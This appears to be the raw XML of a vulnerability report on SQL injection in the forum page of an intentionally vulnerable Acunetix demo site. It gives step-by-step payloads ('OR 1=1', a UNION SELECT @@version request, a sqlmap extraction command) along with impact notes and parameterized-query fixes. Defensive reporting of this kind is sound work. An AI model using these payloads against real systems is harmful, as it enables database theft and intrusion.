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CE8AB">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1A1A2E"/>
        <w:spacing w:before="320" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TASK 3 REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3347C626">
      <w:pPr>
        <w:spacing w:before="320" w:after="0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60"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="1760"/>
      </w:tblGrid>
      <w:tr w14:paraId="2FC0B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6417B61">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="AAAACC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>REPORT TYPE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04E23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F3BEC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Injection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33BA389">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="AAAACC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SEVERITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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C0392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D5CC2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</w:tr>
      <w:tr w14:paraId="10EB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AD5F2A1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VULN TYPE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5F69A56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Boolean-Based / In-Band SQLi (CWE-89)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97E5DC7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CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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DED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4E7D66B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9.8 / 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="294F9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83FB927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DOMAIN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B6E2CE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vulnweb.com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28CEE9A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STATUS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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9F7E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6AD32E2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Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5688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32C6F78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SUBDOMAIN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DF927A0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testasp.vulnweb.com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8648C8B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PLATFORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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8B4FF1E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HackerOne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4F0A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7C1805E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ENDPOINT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F400F5D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/showforum.asp?id=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20FBE49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10B75ED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April 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0A58D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F3AF465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PARAMETER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F2FDF90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  (GET)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ED3D144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AUTH REQ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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ABE450B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None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EB42015">
      <w:pPr>
        <w:spacing w:before="360" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7611D7A2">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F04E23" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F04E23"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C711254">
      <w:pPr>
        <w:spacing w:after="10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testasp.vulnweb.com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's forum endpoint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http://testasp.vulnweb.com/showforum.asp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is vulnerable to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SQL Injection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via the GET parameter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"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. The parameter does not sanitize or parameterize user input, allowing an attacker to inject arbitrary SQL and manipulate the backend database query directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD38D37">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FA2896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As per OWASP's definition: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"SQL injection attacks consist of insertion or 'injection' of a SQL query via the input data from the client to the application."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC5C7E">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A51E03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This happens because the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id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GET parameter is directly concatenated into the SQL query without sanitization, escaping, or use of prepared statements. An attacker can inject a payload such as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0 OR 1=1--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to return all records, confirm the vulnerability, and escalate to full database extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1214D30F">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4B0458">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F04E23" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F04E23"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. TARGET INFORMATION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120"/>
      </w:tblGrid>
      <w:tr w14:paraId="433A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0DB220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B50CB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08E4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0653456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Domain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5318BC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vulnweb.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E91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02C8FB8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Subdomain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A1E7833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testasp.vulnweb.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="637E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0F92C88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Vulnerable URL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75E09EB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http://testasp.vulnweb.com/showforum.asp?id=0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="298D9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2DC8AFA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Vulnerable Parameter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8824F78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  (GET parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0231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0E1888B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Injection Type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D7E3E09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Boolean-Based In-Band SQL Injection — OR 1=1 logic bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="251D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5020231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Technology Stack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0925536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Microsoft ASP (Classic), IIS Web Server, Microsoft SQL Server (MSSQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6894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1728CDE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Authentication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9F7E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B82A440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None required — publicly accessible endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0120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F037861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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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9F7E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E251135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Authorized test environment — intentionally vulnerable (Acunetix Demo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54B2D22F">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EDB0E1B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F04E23" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F04E23"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. STEPS TO REPRODUCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFE97B0">
      <w:pPr>
        <w:spacing w:after="10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Step 1 — Confirm the Injection Point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6360B2DC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>To reproduce this, an attacker navigates to the base URL to observe normal application behavior, then injects a single quote to probe for SQL errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508E0F1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HosGET /showforum.asp?id=0' HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C0814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t: testasp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD9CB8">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79DEE001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Expected result: a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database error message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is exposed in the HTML response — confirming unsanitized input is passed directly to the SQL query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478451CC">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A313ED">
      <w:pPr>
        <w:spacing w:after="10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Step 2 — Prepare a Boolean-Based SQL Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C479A5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The attacker prepares an SQL payload that forces a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TRUE condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, causing the application to return all records instead of only the record with id=0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2AF23">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1E1E2E"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Payload:  0 OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221DF87">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C01962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Inject this payload into the vulnerable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id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parameter, creating a crafted GET request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068CE92A">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67AB4A92">
      <w:pPr>
        <w:spacing w:after="10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Step 3 — Inject the Payload via Crafted GET Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088117F4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GET /showforum.asp?id=0%20OR%201%3D1-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB20529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Host: testasp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37832440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Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034DC837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Accept: */*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729FEC5F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Accept-Language: en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13486C3E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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3EB4BB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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A480B7">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58087AA3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Expected result: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all forum records are returned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instead of just the record for id=0 — the injected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OR 1=1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evaluates to TRUE and bypasses the WHERE clause filter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CA87A">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4207FD8D">
      <w:pPr>
        <w:spacing w:after="10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Step 4 — Confirm with FALSE Condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58A4B0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>Inject the opposite condition to verify the data changes based on the injected logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51115686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GET /showforum.asp?id=0%20AND%201%3D2-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5574A638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Host: testasp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDCD7E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAD6C69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Expected result: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no records returned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— the FALSE condition confirms that application output is controlled by the injected SQL logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C4C79A">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D4D36E">
      <w:pPr>
        <w:spacing w:after="10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Step 5 — Escalate: Extract Database Version via UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A065B74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>As this injection occurs in a GET parameter, the attacker can send the crafted link to any user or escalate extraction with UNION-based payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2394F506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GET /showforum.asp?id=0%20UNION%20SELECT%20NULL%2C%40%40version%2CNULL-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7EF0F7">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1E1E2E"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="50FA7B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Host: testasp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2783302B">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39ABC04C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Expected result: the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SQL Server version string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is returned inline in the page response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D3335">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45285272">
      <w:pPr>
        <w:spacing w:after="10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Step 6 — Automate Full Extraction (PoC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF45D16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>Use sqlmap for complete automated database enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EDA160">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1E1E2E"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=0" --dbs --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57564D73">
      <w:pPr>
        <w:spacing w:before="60" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B6AE76">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Expected result: sqlmap confirms the injection, identifies the DBMS as Microsoft SQL Server, and lists all accessible databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327A666">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572D62D9">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F04E23" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F04E23"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. IMPACT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E9D5A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>With this SQL injection vulnerability, an attacker could unwillingly make the application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6311ECFD">
      <w:pPr>
        <w:spacing w:before="60" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA867BF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4.1  Confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689270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Perform full database extraction — dump all tables, rows, and columns including user credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37DD8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View any information the application user is able to view, including private forum posts and user profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E7388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Steal session tokens or authentication data stored in the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F136B5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4.2  Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC5789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Modify any information the application is able to modify — update records, change passwords, escalate privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039CCCC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Insert rogue admin accounts via direct SQL INSERT statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7835EB0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Delete or corrupt application data via DROP or DELETE statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416700BC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4.3  Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4F57C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Cause denial of service via resource-exhausting queries or mass data deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E7364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Execute OS-level commands via MSSQL's xp_cmdshell (if enabled), potentially achieving full server compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5173445E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4.4  Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5D3B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Interact with other application users as the attacker — full account takeover is possible if session tokens are extracted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE4DDF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Escalate to administrative access by reading or overwriting credential tables directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C353840">
      <w:pPr>
        <w:spacing w:before="80" w:after="0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520"/>
      </w:tblGrid>
      <w:tr w14:paraId="56C3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FCE9FC7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OWASP Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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2E7EAAB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A03:2021 — Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E2C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0C623C1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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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7D2E298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CWE-89: Improper Neutralization of Special Elements in SQL Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6CA8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3A752A6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CVSS v3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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DED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38E2BC1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9.8 CRITICAL  (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="130C7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18202B6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User Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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C9DC5EC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None required — fully exploitable without victim interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2025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AAA056D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="555577"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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1526181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None required by attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="167F5449">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62040FF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F04E23" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F04E23"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5. MITIGATION &amp; REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060C6B10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5.1  Primary Fix — Use Parameterized Queries (MUST DO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CC3B21">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">All user-supplied input passed into SQL queries must use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parameterized queries / prepared statements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. The root cause here is direct string concatenation of the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id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 parameter into the SQL query. Fix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23328BFE">
      <w:pPr>
        <w:spacing w:before="60" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C53C021">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1E1E2E"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>' VULNERABLE (do not use):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342ADB51">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1E1E2E"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sql = "SELECT * FROM forums WHERE id = " &amp; Request.QueryString("id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C76D7C2">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C25F6FE">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1E1E2E"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>' SECURE (parameterized):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF957B8">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1E1E2E"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sql = "SELECT * FROM forums WHERE id = ?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B51DD9F">
      <w:pPr>
        <w:shd w:val="clear" w:fill="1E1E2E"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CInt(id))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB67AB">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215B974C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5.2  Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1100A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Whitelist expected input types — the id parameter should only accept integers; reject everything else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBBAC1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Use server-side type casting: CInt() or CLng() for numeric parameters in ASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC7EE6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Reject inputs containing SQL metacharacters: ' " ; -- /* */ xp_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45174B2A">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="679B9DBE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5.3  Principle of Least Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C42E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The database account used by the web application should have READ-ONLY access where possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8B1D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Never connect to the database as sa, root, or admin from the web application tier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66036AA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Disable xp_cmdshell and other dangerous stored procedures in MSSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A93D49">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17777390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5.4  Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE91D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Never expose raw database errors to end users — log them server-side only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FE5E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Display only generic messages to users: "An error occurred. Please try again."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508884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Implement a centralized error handler in ASP to prevent information leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B27B7">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55DE4B0C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5.5  Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24752F0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Deploy a WAF (e.g., ModSecurity, AWS WAF, Cloudflare) as a defense-in-depth layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1406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Note: a WAF is a compensating control — it does not substitute for fixing the root cause in code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2500B8">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E95133">
      <w:pPr>
        <w:spacing w:before="240" w:after="10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5.6  Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD3DD6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Integrate SAST (Static Application Security Testing) in the CI/CD pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D190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Perform regular DAST scans using tools like OWASP ZAP or Acunetix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB4DE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333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Conduct periodic manual penetration tests against the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BD809">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF7D896">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F04E23" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F04E23"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6. SUPPORTING MATERIAL / REFERENCES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320"/>
        <w:gridCol w:w="5200"/>
      </w:tblGrid>
      <w:tr w14:paraId="71FD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7AC81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73213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 / Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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DA919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EC1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420EF94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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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DFAE765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error_poc.png</w:t>
            </w:r>
